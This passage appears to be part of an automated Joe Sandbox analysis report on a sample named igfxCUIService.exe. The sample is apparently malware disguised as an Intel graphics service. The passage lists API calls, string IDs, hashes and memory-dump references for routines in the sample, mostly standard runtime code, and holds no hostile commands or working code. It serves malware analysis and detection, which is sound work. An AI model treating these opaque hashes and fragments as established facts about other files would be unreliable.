                                  • Opcode Fuzzy Hash: 91afcd7988a1aa4e63a59d2ecd8e60437bcdcec2777d904bdfe22156c7e0f392
                                  • Instruction Fuzzy Hash: F451E3719002489FEB18CFA8DD45B9DFBB6EF85704F10865CE404A7392DB75DA848B70
                                  Uniqueness
                                  • Uniqueness Score: 100.00%

                                  Similarity
                                  • API ID:
                                  • String ID: C:\ProgramData\SystemData\igfxCUIService.exe
                                  • API String ID: 0-411192752
                                  • Opcode ID: 194277f492c5781ddead5926f55dd97a1d6d0857bcfeec2107c90b15e88bccd9
                                  • Instruction ID: 6d0c8b32ce6500b51f6069d1b3179ddb5e427b809e3fd82335e9e8a0bb2f687f
                                  • Opcode Fuzzy Hash: 194277f492c5781ddead5926f55dd97a1d6d0857bcfeec2107c90b15e88bccd9
                                  • Instruction Fuzzy Hash: BD317071E00714ABCB21DF99D885AAEBBB8EF89310B94406AF405E7251D7B09E44CBB0
                                  Uniqueness
                                  • Uniqueness Score: 100.00%

                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D12C5F
                                    • Part of subcall function 00D3731A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00D121DC,?,?,?,00D121DC,?,00D6D414), ref: 00D3737A
                                  Similarity
                                  • API ID: ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 3109751735-1866435925
                                  • Opcode ID: a42b554ce43014957190152456c2c16ee1411f528fc9041e20209179efaf4edc
                                  • Instruction ID: afea3b00a7c3ac831a32b897bb7819733d9ad602b6a35e48d105b9395163c4c3
                                  • Opcode Fuzzy Hash: a42b554ce43014957190152456c2c16ee1411f528fc9041e20209179efaf4edc
                                  • Instruction Fuzzy Hash: AD1103B15047046BC710DF58D842BA6B3E8EF51310F148A2AF9548BA41EB71E9A4CBB5
                                  Uniqueness

                                  Uniqueness Score: 7.75%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  • Opcode ID: 30215aa7633be5a151444ef3af0f45258a63018f10652b0b38a6e06bf638477f
                                  • Instruction ID: b5761b1db5ec977d2eb8ca3a90d9083849ef0e4332de96a9749aea9d2577004a
                                  • Opcode Fuzzy Hash: 30215aa7633be5a151444ef3af0f45258a63018f10652b0b38a6e06bf638477f
                                  • Instruction Fuzzy Hash: A7B104729082969FDF11CF68C881BBEBBE5EF55350F2981AAE8959B241D734CD01CB70
                                  Uniqueness

                                  Uniqueness Score: 0.57%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 3bc2d7bf8cb0310a7c803761b8c0ffa9d1a9e161ab6a3a1f88319d1d8fc0d36d
                                  • Instruction ID: 763ab4f2c6cb3576bdfb3344aff1c783f2c1c4ed2fc70a8cc9d9b317fff9201d
                                  • Opcode Fuzzy Hash: 3bc2d7bf8cb0310a7c803761b8c0ffa9d1a9e161ab6a3a1f88319d1d8fc0d36d
                                  • Instruction Fuzzy Hash: BC51F5B2A047069FDB298F14D865B7AF7A4EF40710F18452DEC4657291E7B2ED40D7B0
                                  Uniqueness

                                  Uniqueness Score: 1.18%

                                  APIs
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000004,?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D26E01
                                  • GetLastError.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D26E15
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D26E31
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D26E59
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1717984340-0
                                  • Opcode ID: 25e7db7a68214417408d02f55875310b9584bd32e1e4a5a968e79d83735c5815
                                  • Instruction ID: 701a2b88894c3eff55344f6b14d29c0d6a7d39236454bcf80f50b1bc77dcd987
                                  • Opcode Fuzzy Hash: 25e7db7a68214417408d02f55875310b9584bd32e1e4a5a968e79d83735c5815
                                  • Instruction Fuzzy Hash: EE41D476B40325FBDB205FA8FC41BAABB65EF24715F244129FE05E6180EB71E91087B1
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  APIs
                                  • _free.LIBCMT ref: 00D5597E
                                  • _free.LIBCMT ref: 00D559A7
                                  • SetEndOfFile.KERNEL32(00000000,00D53F56,00000000,00D48E9C,?,?,?,?,?,?,?,00D53F56,00D48E9C,00000000), ref: 00D559D9
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00D53F56,00D48E9C,00000000,?,?,?,?,00000000), ref: 00D559F5
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFileLast
                                  • String ID:
                                  • API String ID: 1547350101-0
                                  • Opcode ID: 6e0c7b07462ccbc369282568cd5afad4d60b5c2eb5bdb86f661fa043acfbdf38
                                  • Instruction ID: c4304d2586fcbc0e587b71bf6009862a35e12e91f0abd12b413c30aa24a0e536
                                  • Opcode Fuzzy Hash: 6e0c7b07462ccbc369282568cd5afad4d60b5c2eb5bdb86f661fa043acfbdf38
                                  • Instruction Fuzzy Hash: B241B476900A45EBDF12ABA8DC56B9D77A5EF45372F180210FD24EB195EA38CC488F31
                                  Uniqueness

                                  Uniqueness Score: 1.64%

                                  APIs
                                  • GetLastError.KERNEL32(00000008,?,00000000,00D4C55A,00D3591B,00D35961,?,00D357A8,00000000), ref: 00D46F72
                                  • _free.LIBCMT ref: 00D46FCF
                                  • _free.LIBCMT ref: 00D47005
                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00D357A8,00000000), ref: 00D47010
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: 866d10844e87028f72ebead2e691097158a2ee12b37655b85e1e4dfd3fecffbf
                                  • Instruction ID: ddfc000b5f56e508e1b126da68e029b787eec45e7ae12b90f7cb207caf011fcf
                                  • Opcode Fuzzy Hash: 866d10844e87028f72ebead2e691097158a2ee12b37655b85e1e4dfd3fecffbf
                                  • Instruction Fuzzy Hash: 2A1136322047116FDA11327ABC81D2B26A9CFC3375B290234F622C22D5DE75CC086172
                                  Uniqueness

                                  Uniqueness Score: 0.28%

                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00D4185C,00D46950,?,?,00D348E0,?,?,00D28B4A,?,?,00D11154), ref: 00D470C9
                                  • _free.LIBCMT ref: 00D47126
                                  • _free.LIBCMT ref: 00D4715C
                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00D4185C,00D46950,?,?,00D348E0,?,?,00D28B4A,?), ref: 00D47167
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: fb0e7c61bcce5985b75bceed4d8b4f558b07f81dfe8f5d912bd41a64d4aeadee
                                  • Instruction ID: e3c4c3aefe08d0a79c3139c93f7346114d36dbaef86f6b90e5dc68ca4ae4fe67
                                  • Opcode Fuzzy Hash: fb0e7c61bcce5985b75bceed4d8b4f558b07f81dfe8f5d912bd41a64d4aeadee
                                  • Instruction Fuzzy Hash: 6F1108326083116BEA20377A9C85D2B63AADBC37B5B290234F525D22E1DFB5CC05A172
                                  Uniqueness

                                  Uniqueness Score: 0.28%

                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00D5329D,00000000,00000001,00000000,00000000,?,00D48407,?,00D41707,00000000), ref: 00D557B9
                                  • GetLastError.KERNEL32(?,00D5329D,00000000,00000001,00000000,00000000,?,00D48407,?,00D41707,00000000,?,00000000,?,00D4895B,?), ref: 00D557C5
                                    • Part of subcall function 00D5578B: CloseHandle.KERNEL32(FFFFFFFE,00D557D5,?,00D5329D,00000000,00000001,00000000,00000000,?,00D48407,?,00D41707,00000000,?,00000000), ref: 00D5579B
                                  • ___initconout.LIBCMT ref: 00D557D5
                                    • Part of subcall function 00D5574D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D5577C,00D5328A,00000000,?,00D48407,?,00D41707,00000000,?), ref: 00D55760
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00D5329D,00000000,00000001,00000000,00000000,?,00D48407,?,00D41707,00000000,?), ref: 00D557EA
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: a5e0be221eec9a9cd54e7fc6ffed430bbd67e1eead13a061f9e53cd9558bb470
                                  • Instruction ID: 941f78a3551d6be6c0a9c16440f44e57b36d5d9b45b9a85275ef3136451e1315
                                  • Opcode Fuzzy Hash: a5e0be221eec9a9cd54e7fc6ffed430bbd67e1eead13a061f9e53cd9558bb470
                                  • Instruction Fuzzy Hash: 18F01C3A401724FBCF621FD9EC0998A3F66EF093A2B044510FF19D6234D6328820DBB1
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  APIs
                                  • SleepConditionVariableCS.KERNELBASE(?,00D3461A,00000064), ref: 00D346A0
                                  • LeaveCriticalSection.KERNEL32(00D6F1D8,?,?,00D3461A,00000064,?,00D7013C,?,00D14124,00D701A8,00D7013C,00D1834F,F0B87680,0000000F,?,00000000), ref: 00D346AA
                                  • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D3461A,00000064,?,00D7013C,?,00D14124,00D701A8,00D7013C,00D1834F,F0B87680,0000000F,?,00000000), ref: 00D346BB
                                  • EnterCriticalSection.KERNEL32(00D6F1D8,?,00D3461A,00000064,?,00D7013C,?,00D14124,00D701A8,00D7013C,00D1834F,F0B87680,0000000F,?,00000000), ref: 00D346C2
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                  • String ID:
                                  • API String ID: 3269011525-0
                                  • Opcode ID: 2de3991e41cb3c942c1f87f3ef68736ca8127e94ec893954e2b4fa44cbcfc710
                                  • Instruction ID: c15cb974c29ec268ed2727c8c1ce22c0ba0e433c50a1bc421a0839b7d6c65478
                                  • Opcode Fuzzy Hash: 2de3991e41cb3c942c1f87f3ef68736ca8127e94ec893954e2b4fa44cbcfc710
                                  • Instruction Fuzzy Hash: D8E01232941B34EFC7111F58FC0998D7E28AB077A3F015120FD05A63A4C66958049BF5
                                  Uniqueness

                                  Uniqueness Score: 3.32%

                                  APIs
                                  • _free.LIBCMT ref: 00D43769
                                    • Part of subcall function 00D468D3: HeapFree.KERNEL32(00000000,00000000,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?), ref: 00D468E9
                                    • Part of subcall function 00D468D3: GetLastError.KERNEL32(?,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?,?), ref: 00D468FB
                                  • _free.LIBCMT ref: 00D4377C
                                  • _free.LIBCMT ref: 00D4378D
                                  • _free.LIBCMT ref: 00D4379E
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 3a4cedb15849ef4e410ca0b035de471779e0f104c68ff209f1bf718ec41086ce
                                  • Instruction ID: c2c5d3cca2356c7bf637e9741bcc08d775cb4a55a7bd26393946efb38124c5ab
                                  • Opcode Fuzzy Hash: 3a4cedb15849ef4e410ca0b035de471779e0f104c68ff209f1bf718ec41086ce
                                  • Instruction Fuzzy Hash: 87E09971820BA09B86026F54BC0184A3F22EB5B7103051226F40196BB3CBFA4A5A9BB2
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D133AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: parse error$ror
                                  • API String ID: 2659868963-4201802366
                                  • Opcode ID: 3fb0a6f96070405df3c0d1db9675f4ab7237da60610466f3fb4796efc5e2ffb9
                                  • Instruction ID: 830a4b53a1e08b202717b619b317508c1eaea4630e1de5197efd158fb9f16fb3
                                  • Opcode Fuzzy Hash: 3fb0a6f96070405df3c0d1db9675f4ab7237da60610466f3fb4796efc5e2ffb9
                                  • Instruction Fuzzy Hash: 36B190719002589FEB19CF68DC45B9DFBB2EF85304F108298E418AB396DB759AC4CB71
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00D31800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: cannot get value
                                  • API String ID: 118556049-2333289761
                                  • Opcode ID: b3134a63dec23285748293be9368f15d5a7d846457bff7898077ad03b71b8898
                                  • Instruction ID: 3c4ee9075d153628dd4253641fa48781274fbfef5cda9749177f6495f685689d
                                  • Opcode Fuzzy Hash: b3134a63dec23285748293be9368f15d5a7d846457bff7898077ad03b71b8898
                                  • Instruction Fuzzy Hash: 03919E7990021A9FCB14DF98D490AAEFBB4FF58310F188199E855AB346D730AD05CFB0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: [json.exception.
                                  • API String ID: 0-791563284
                                  • Opcode ID: e6185e3edabc929ff573ce7b01e2272315bfb854afdec083921394c73db801b0
                                  • Instruction ID: a0bc33c537cecfcbd1bf70cf354e062e475a14c8582a34eecabbb46a79e8dd0b
                                  • Opcode Fuzzy Hash: e6185e3edabc929ff573ce7b01e2272315bfb854afdec083921394c73db801b0
                                  • Instruction Fuzzy Hash: 2C9115719002489BEB18CF68D885BEEFBB5EF45304F10465CE814A73C2DB75AA95CBB0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 00D45D3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorHandling__start
                                  • String ID: pow
                                  • API String ID: 3213639722-2276729525
                                  • Opcode ID: 3a1ebb6794a02e3fc77323092ba9b09dea6031ef931267f8805a4c5987aa3873
                                  • Instruction ID: 2e7dff05a39d73c1e38d8ba4678c19139d1b168d334fb02cf7494d795d506de4
                                  • Opcode Fuzzy Hash: 3a1ebb6794a02e3fc77323092ba9b09dea6031ef931267f8805a4c5987aa3873
                                  • Instruction Fuzzy Hash: 67517A29E08A0197CF117714D9553696BA0EF40702F2C4D68ECE2862AEEB30CCCD9E72
                                  Uniqueness

                                  Uniqueness Score: 0.11%

                                  APIs
                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00D39603
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID: MOC$RCC
                                  • API String ID: 2118026453-2084237596
                                  • Opcode ID: f5aa083b73e5f35439aad1bbca8c639b037f2f1c449f61897d9f788b0f2aaac1
                                  • Instruction ID: fb60f49807657899b9b2867e118131012444a392574f77d022e34b13ff2d0768
                                  • Opcode Fuzzy Hash: f5aa083b73e5f35439aad1bbca8c639b037f2f1c449f61897d9f788b0f2aaac1
                                  • Instruction Fuzzy Hash: A1417872900209AFCF16DF98CC92AEEBBB5FF48304F1881A9F904A7261D3759950DF60
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D1287B
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D128CA
                                    • Part of subcall function 00D35876: _Yarn.LIBCPMT ref: 00D35895
                                    • Part of subcall function 00D35876: _Yarn.LIBCPMT ref: 00D358B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                  • String ID: bad locale name
                                  • API String ID: 1908188788-1405518554
                                  • Opcode ID: 22d6fdd791c90981b1d303ddc7d85292a6fb51751d937c53b846f5b629961a9d
                                  • Instruction ID: e9caac9ff5e4ea0564129664dbb1427af1630d9ab13393ac00945e21a5de0ea6
                                  • Opcode Fuzzy Hash: 22d6fdd791c90981b1d303ddc7d85292a6fb51751d937c53b846f5b629961a9d
                                  • Instruction Fuzzy Hash: 92119E71904B44AFD320CF69D801747BBE4EB19710F008A1EE889C7B80D7B5A508CBB1
                                  Uniqueness

                                  Uniqueness Score: 3.53%

                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2FE2A
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2FE40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: fdb259bb2c90af5c4afbe49b9b1017f0d938742fa677713ce2cefd6ac6db09ef
                                  • Instruction ID: df5ffb118dd57dd8bf57cdf1c6eec9cd95cca7bf1fd93921be9d9274153c2357
                                  • Opcode Fuzzy Hash: fdb259bb2c90af5c4afbe49b9b1017f0d938742fa677713ce2cefd6ac6db09ef
                                  • Instruction Fuzzy Hash: 40214A70C1422CEEDB11EBA0C845BDEBB78AF15308F544099E845B3282EB706B48DFB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                    • Part of subcall function 00D355C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D355D0
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D2930F
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D29336
                                  Strings
                                  • invalid string position, xrefs: 00D292E0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy$std::invalid_argument::invalid_argument
                                  • String ID: invalid string position
                                  • API String ID: 2082942147-1799206989
                                  • Opcode ID: 8c55da7eeb292689d1209a0f610b9b557745d10130b50c46bff5d6ad5b17e473
                                  • Instruction ID: 63bd840da52052bbbcc2f10307f563192a2ae40ae17beb3113aa526b7fcef39a
                                  • Opcode Fuzzy Hash: 8c55da7eeb292689d1209a0f610b9b557745d10130b50c46bff5d6ad5b17e473
                                  • Instruction Fuzzy Hash: 24F0ECB6910719ABC7019FA9D844886F7ECFE563117108726F91597B00F7B0F5688BB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                    • Part of subcall function 00D13F80: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,00D36520,?,?,?,00D12074), ref: 00D13F85
                                    • Part of subcall function 00D13F80: GetLastError.KERNEL32(?,?,?,00D12074), ref: 00D13F8F
                                  • IsDebuggerPresent.KERNEL32(?,?,?,00D12074), ref: 00D36524
                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D12074), ref: 00D36533
                                  Strings
                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D3652E
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
